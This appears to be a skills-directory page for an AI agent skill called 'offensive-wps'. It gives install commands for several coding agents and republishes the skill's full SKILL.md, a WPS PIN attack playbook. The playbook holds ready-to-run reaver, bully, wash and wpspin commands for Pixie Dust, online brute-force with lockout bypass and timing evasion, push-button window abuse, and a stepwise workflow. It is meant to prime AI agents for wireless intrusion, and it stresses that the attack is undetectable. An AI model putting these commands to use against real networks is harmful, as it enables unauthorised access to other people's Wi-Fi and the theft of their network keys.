Fla Ascend Performance
fla-org/flash-linear-attention
Guidelines for Ascend NPU kernel / Triton-Ascend backend performance work in the FLA repo.
WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-wps --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .claude/skills && cp -r skills-src/Skills/wireless/offensive-wps .claude/skills/offensive-wps && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "offensive-wps" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wps into .claude/skills/offensive-wps/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-wps", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wpsType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-wps --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .agents/skills && cp -r skills-src/Skills/wireless/offensive-wps .agents/skills/offensive-wps && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "offensive-wps" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wps into .agents/skills/offensive-wps/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-wps", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-wps --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/Skills/wireless/offensive-wps .cursor/skills/offensive-wps && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "offensive-wps" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wps into .cursor/skills/offensive-wps/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-wps", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/SnailSploit/Claude-Red.git --path Skills/wireless/offensive-wps--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-wps --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/Skills/wireless/offensive-wps .gemini/skills/offensive-wps && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "offensive-wps" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wps into .gemini/skills/offensive-wps/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-wps", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install SnailSploit/Claude-Red offensive-wpsInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .github/skills && cp -r skills-src/Skills/wireless/offensive-wps .github/skills/offensive-wps && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "offensive-wps" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wps into .github/skills/offensive-wps/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-wps", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-wps --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/Skills/wireless/offensive-wps .opencode/skills/offensive-wps && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "offensive-wps" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-wps into .opencode/skills/offensive-wps/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-wps", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
offensive-wpsWPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…
Offensive Wps is an agent skill from SnailSploit/Claude-Red. WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation. Use when a target SOHO router exposes WPS — common on consumer ISP gear, often left enabled by default even when WPS attacks have been known for over a decade.
Its SKILL.md is about 1.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security. The repository describes itself as: claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level… The licence is MIT.
4 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit 739512a. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
No scripts in the folder and no shell commands in SKILL.md (its code samples are bash).
From the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
github.comFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Offensive Wps loads about 1.5k tokens when it runs. Until then it costs about 117 tokens; SKILL.md has 521 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check noted patterns worth knowing about, such as sudo or a known installer.
sudo wash -i wlan0monsudo airodump-ng wlan0mon --wpssudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvvsudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0monsudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '00000000' -Psudo airmon-ng check kill && sudo airmon-ng start wlan0sudo wash -i wlan0monsudo reaver -i wlan0mon -b <BSSID> -K 1 -vvvsudo reaver -i wlan0mon -b <BSSID> -L -N -d 15 -t 30 -r 3:30 -vvAutomated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from SnailSploit/Claude-Red at commit 739512a, republished under its MIT licence (© SnailSploit). 521 words, ~1,458 tokens.
.claude/skills/offensive-wps/SKILL.md (or your agent's skills folder).WPS converts an 8-digit PIN into the network PSK via the M3/M4 message exchange. The PIN is split into 4-digit + 3-digit halves (the 8th digit is a checksum), giving only 11,000 effective combinations — and on vulnerable chipsets, the offline Pixie Dust attack recovers the PIN in seconds without ever sending an online attempt.
# wash — dedicated WPS scanner
sudo wash -i wlan0mon
# Or use airodump-ng with WPS column
sudo airodump-ng wlan0mon --wpsOutput includes: WPS version (1.0 / 2.0), Locked status, Configured/Unconfigured, vendor.
WPS 2.0 introduced lockout enforcement, but many consumer APs still implement it as "lock for 60 seconds after 3 failures" — easily bypassed by waiting.
The Pixie Dust attack exploits weak nonce generation in WPS-implementing chipsets. The attack captures one full WPS handshake (M1-M4) and then offline-computes the PIN.
# reaver with Pixie Dust mode
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# bully alternative
sudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon| Chipset | Vulnerable? |
|---|---|
| Ralink (RT chipsets) | Yes — most older D-Link, TP-Link, Edimax |
| Realtek (RTL8xxx) | Yes — many TRENDnet, Belkin |
| Broadcom (older firmware) | Often yes — specific model + firmware revs |
| MediaTek (specific revs) | Mixed |
| Atheros | Mostly patched |
When successful:
[Pixie-Dust] WPS PIN: 12345670
[Pixie-Dust] WPA PSK: ActualPasswordHere
[Pixie-Dust] AP SSID: HomeWiFiThe PIN gives you the PSK directly via the M7 message — no PSK cracking needed.
When Pixie Dust fails, online brute is the fallback. Send EAPOL-Start → M1 → M2 → M3 attempts with successive PINs.
# reaver online mode (default)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \
-L -N -d 15 -t 30 -T .5 -r 3:30 -vv
# Flags:
# -L : ignore failed lockouts
# -N : don't send NACK packets
# -d 15 : 15-second delay between attempts
# -t 30 : timeout
# -T .5 : timeout for receiving M5/M7
# -r 3:30 : pause 30s every 3 attemptsMost modern APs lock WPS after a few failed PINs. Detect lockout:
Locked flag in beacon switches to YesStrategies:
-r accordingly.WPS PBC opens a 120-second window after the user presses the button on the AP. During this window any client requesting WPS is paired without PIN.
Attack viability:
# Trigger PBC pairing attempt
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '00000000' -PSome vendors derive the WPS PIN from MAC + serial. With known algorithms:
# wpscalc / WPSPIN — calculate likely PINs from BSSID
wpspin --bssid AA:BB:CC:DD:EE:FF
# Outputs candidate PINs to try first before bruteHit rate is high on certain Belkin, ZyXEL, and Linksys models.
| Signal | Defender View |
|---|---|
| Reaver/bully traffic pattern | WIPS rule: rapid WPS exchange attempts |
| PIN failures spike | WPS Locked flag flip |
| Vendor PSK leaked offline | Undetectable — Pixie Dust is offline |
| Consumer admin interface | "WPS attempt" might log if AP has audit features (rare) |
Pixie Dust against a vulnerable chipset is essentially undetectable from the wire perspective — only one WPS exchange happens, identical to a legitimate client.
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
# 2. Find WPS APs
sudo wash -i wlan0mon
# 3. Pixie Dust first
sudo reaver -i wlan0mon -b <BSSID> -K 1 -vvv
# 4. If Pixie Dust fails, try vendor-specific PIN candidates
wpspin --bssid <BSSID> | head -10
# 5. Online brute as last resort
sudo reaver -i wlan0mon -b <BSSID> -L -N -d 15 -t 30 -r 3:30 -vv
# 6. Once PIN known, derive PSK from M7 message
# (reaver does this automatically; bully prints PSK on success)© SnailSploit, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in Skills/wireless/offensive-wps of SnailSploit/Claude-Red.
Open the folder on GitHubat commit 739512a
Offensive Wps next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Offensive Wps this skillSnailSploit/Claude-Red | 7.3k | — | ~1.5k | Automated safety check: Notes | MIT | |
| Fla Ascend Performancefla-org/flash-linear-attention | 5.8k | — | ~5.6k | Automated safety check: Pass | MIT | |
| Deepsec Documentation Guidevercel-labs/deepsec | 8.1k | — | ~956 | Automated safety check: Pass | Apache-2.0 | |
| Skill Scannergetsentry/skills | 1k | 4 repos | ~2.5k | Automated safety check: Warn | Apache-2.0 | |
| Serenity Aleabitoreddityan-labs/serenity-aleabitoreddit | 479 | 1 repos | ~3.3k | Automated safety check: Pass | None | |
| Security Alert Triageelastic/agent-skills | 592 | 1 repos | ~3.5k | Automated safety check: Notes | Apache-2.0 |
fla-org/flash-linear-attention
Guidelines for Ascend NPU kernel / Triton-Ascend backend performance work in the FLA repo.
vercel-labs/deepsec
Points the agent at deepsec's own docs to answer questions about initializing, configuring, resuming, scanning with and extending the vulnerability scanner.
getsentry/skills
Scan agent skills for security issues. An agent skill from getsentry/skills.
yan-labs/serenity-aleabitoreddit
Apply trader Serenity's (@aleabitoreddit) AI/semiconductor supply-chain analytical lens to US-stock ideas and market judgment.
elastic/agent-skills
Triage Elastic Security alerts — gather context, classify threats, create cases, and acknowledge.
SummerSec/ShiroAttack2
当用户要求利用、检测或测试 Apache Shiro rememberMe 反序列化漏洞 (Shiro-550, CVE-2016-4437) 时使用。触发词包括 "Shiro"、"rememberMe"、"shiro attack"、"CVE-2016-4437"、"Shiro-550"、"爆破 Shiro key"、"利用 Shiro"、"Shiro…
SnailSploit/Claude-Red
KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.
SnailSploit/Claude-Red
Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies…
SnailSploit/Claude-Red
LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz…
SnailSploit/Claude-Red
Mobile (Android + iOS) application penetration testing methodology.
SnailSploit/Claude-Red
Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.
SnailSploit/Claude-Red
Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection…
Categories
WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…. Offensive Wps is an agent skill from SnailSploit/Claude-Red. WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation.
Offensive Wps fits situations like: A target SOHO router exposes WPS — common on consumer ISP gear; often left enabled by default even when WPS attacks have been known for over a decade.
Run `npx skills add SnailSploit/Claude-Red --skill offensive-wps -a claude-code`. Or copy the skill folder (Skills/wireless/offensive-wps in SnailSploit/Claude-Red) into .claude/skills/offensive-wps in your project. Claude Code loads it when a task matches its description.
Run `npx skills add SnailSploit/Claude-Red --skill offensive-wps -a codex`. Or copy the skill folder (Skills/wireless/offensive-wps in SnailSploit/Claude-Red) into .agents/skills/offensive-wps in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add SnailSploit/Claude-Red --skill offensive-wps -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/offensive-wps, .gemini/skills/offensive-wps, .github/skills/offensive-wps and .opencode/skills/offensive-wps in your project.
SKILL.md names no scripts, command-line tools or credentials: Offensive Wps is instructions for the agent only.
SKILL.md names 1 domain. As links in the text: github.com. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.
Offensive Wps is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 1.5k tokens (SKILL.md is roughly 5.8k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Offensive Wps: Fla Ascend Performance (fla-org/flash-linear-attention, 5.8k stars), Deepsec Documentation Guide (vercel-labs/deepsec, 8.1k stars), Skill Scanner (getsentry/skills, 1k stars) and Serenity Aleabitoreddit (yan-labs/serenity-aleabitoreddit, 479 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
SnailSploit (a GitHub user) maintains it in SnailSploit/Claude-Red, which has 7,321 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on September 19, 2026.
Source: SnailSploit/Claude-Red on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.